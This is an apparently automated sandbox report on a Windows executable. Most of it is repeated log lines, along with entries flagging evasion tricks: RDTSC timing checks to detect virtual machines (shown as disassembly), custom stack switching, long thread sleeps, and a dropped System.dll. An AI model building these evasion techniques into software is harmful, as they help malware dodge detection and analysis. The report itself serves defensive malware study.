Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	API/Special instruction interceptor: Address: 3761783
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	API/Special instruction interceptor: Address: 26F1783

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	RDTSC instruction interceptor: First address: 373CA52 second address: 373CA52 instructions: 0x00000000 rdtsc 0x00000002 test ebx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4D18C63F15h 0x00000008 cmp cl, FFFFFF99h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	RDTSC instruction interceptor: First address: 26CCA52 second address: 26CCA52 instructions: 0x00000000 rdtsc 0x00000002 test ebx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4D192C4115h 0x00000008 cmp cl, FFFFFF99h 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Memory allocated: 4580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Memory allocated: 34EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Memory allocated: 34CB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598699	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597583	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595822	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595657	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595537	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595407	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595043	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 593954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 593829	Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Window / User API: threadDelayed 8332			Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Window / User API: threadDelayed 1480			Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf7A8.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

API coverage: 2.3 %

Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4108	Thread sleep count: 8332 > 30	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4108	Thread sleep count: 1480 > 30	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598699s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597583s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -597079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -596079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595822s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595537s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -595043s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -594079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -593954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe TID: 4104	Thread sleep time: -593829s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0040646B FindFirstFileA,FindClose,	12_2_0040646B
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_004027A1 FindFirstFileA,	12_2_004027A1
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	12_2_004058BF

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598699	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597583	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 596079	Jump to behavior
